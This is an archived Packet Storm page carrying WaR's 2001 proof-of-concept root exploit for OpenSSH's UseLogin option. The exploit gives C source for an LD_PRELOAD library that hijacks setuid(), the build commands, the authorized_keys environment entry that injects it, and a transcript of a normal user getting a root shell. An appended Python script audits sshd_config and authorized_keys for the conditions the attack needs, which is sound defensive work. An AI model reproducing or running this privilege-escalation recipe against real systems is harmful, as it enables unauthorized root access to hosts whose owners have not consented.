UseLogin.txt

🗓️ 09 Dec 2001 00:00:00 · Reported by WaR · Type: packetstorm
🔗 packetstormsecurity.com

Exploit OpenSSH UseLogin bug to gain root access using LD_PRELOAD technique.

Code
`--[ OpenSSH UseLogin bug proof of concept exploit ]--  
by [WaR] <[email protected]> / http://www.genhex.org  
  
  
--[ Intro ]--  
  
I was very curious in finding out how to exploit this problem. Although  
I don't think anyone uses this feature, I looked into the matter anyway.  
Here it goes. It was tested on the following platforms:  
- Slackware 7.1 with OpenSSH3.0p1  
- RedHat 7.1 with OpenSSH_2.9p2  
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)  
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)  
The exploit should work as long as UseLogin does. YMMV.  
  
This is based on libroot from [email protected],  
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and  
you thought it wouldn't happen again...).   
  
Kudos to [email protected] for his help figuring out the problem with   
the Slackware UseLogin, testing on OpenBSD, and giving the idea for  
the seteuid(0) (it originally was a system("/bin/sh");).  
  
  
--[ Code ]--   
  
Create a lib.c file with the following content:  
  
---8<---  
#include <stdio.h>  
#include <sys/types.h>  
#include <unistd.h>  
/* Preloaded replacement for libc's setuid(): login's privilege drop never happens */  
int setuid(uid_t uid){  
    (void)uid;  
    printf("setuid() called...\n");  
    seteuid(0);  
    return 0;  
}  
---8<---  
  
Compile it into a library:  
gcc -c -o lib.o lib.c  
ld -shared -o libroot.so lib.o  
chmod 755 ./libroot.so  
  
  
Now, for the tricky (*g*) part...  
  
You must have an account on the machine, and create an entry  
in $HOME/.ssh/authorized_keys (or authorized_keys2) with:  
  
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>  
  
When sshd receives your connection, it exports this variable  
into the environment *BEFORE* running login. Somewhere after this,  
login calls setuid(); the preloaded library intercepts that call and  
performs seteuid(0) instead.  
  
$ id  
uid=1000(war) gid=100(users) groups=100(users)  
$ ssh war@localhost  
Enter passphrase for key '/home/war/.ssh/id_dsa':  
sh-2.04# id  
uid=0(root) gid=100(users) groups=100(users)  
  
  
It also works remotely. Anyway, you _MUST_ have an account on  
the victim machine so you can set up the environment and log in.  
And obviously (duh) it must have UseLogin enabled.  
  
That's all.  
  
  
shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.   
  
  
-- [WaR]  
"If you can't hack it, hit it with a hammer"  
`
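Defender's-side audit of the two conditions this exploit needs, added here as an example and not part of WaR's post or of OpenSSH itself: an sshd_config that enables UseLogin and still honours per-key environment options, and authorized_keys entries whose environment= option sets a loader variable such as LD_PRELOAD. The PermitUserEnvironment directive checked below did not exist in the OpenSSH releases listed above (those honoured the option unconditionally) and defaults to no where present; all sample inputs are constructed.

```python
import re

RISKY_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT")  # dynamic-loader controls
KEY_RE = re.compile(r"(?:^|\s)(ssh-rsa|ssh-dss|ssh-ed25519|ecdsa-sha2-nistp\d+)\s")

def parse_options(field):
    """Split the comma-separated authorized_keys options field, honouring quotes."""
    out, cur, quoted = [], "", False
    for ch in field:
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            out.append(cur)
            cur = ""
        else:
            cur += ch
    return out + [cur] if cur else out

def risky_environment_options(line):
    """environment= options on one authorized_keys line that set a loader variable."""
    line = line.strip()
    m = None if line.startswith("#") else KEY_RE.search(line)
    if not m:
        return []
    opts = parse_options(line[:m.start()].strip())  # everything before the key type
    return [o for o in opts if o.startswith("environment=")
            and o[len("environment="):].split("=", 1)[0] in RISKY_VARS]

def sshd_config_exposed(config_text):
    """True when UseLogin is on and per-key environment options are honoured."""
    settings = {}
    for raw in config_text.splitlines():
        stmt = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if stmt:
            key, value = (re.split(r"[\s=]+", stmt, maxsplit=1) + [""])[:2]
            settings[key.lower()] = value.strip().lower()
    return (settings.get("uselogin", "no") == "yes"
            and settings.get("permituserenvironment", "no") == "yes")

# Constructed sample inputs, not taken from a real host.
SAMPLE_AUTHORIZED_KEYS = """\
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCx ops@bastion
environment="LD_PRELOAD=/home/war/libroot.so" ssh-dss AAAAB3NzaC1kc3MAAACBAP war@localhost
environment="TZ=UTC",no-pty,command="/usr/bin/uptime" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5 monitor
"""
SAMPLE_SSHD_CONFIG = "Port 22\nUseLogin yes  # session handed to setuid login(1)\nPermitUserEnvironment yes\n"

def audit(authorized_keys=SAMPLE_AUTHORIZED_KEYS, sshd_config=SAMPLE_SSHD_CONFIG):
    flagged = [n for n, l in enumerate(authorized_keys.splitlines(), 1) if risky_environment_options(l)]
    return flagged, sshd_config_exposed(sshd_config)  # (1-based line numbers, bool)
```

Both checks are independent: a flagged key line matters even where UseLogin is off, since the variable still reaches the session, and an exposed sshd_config is worth fixing before any key carries such an option.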
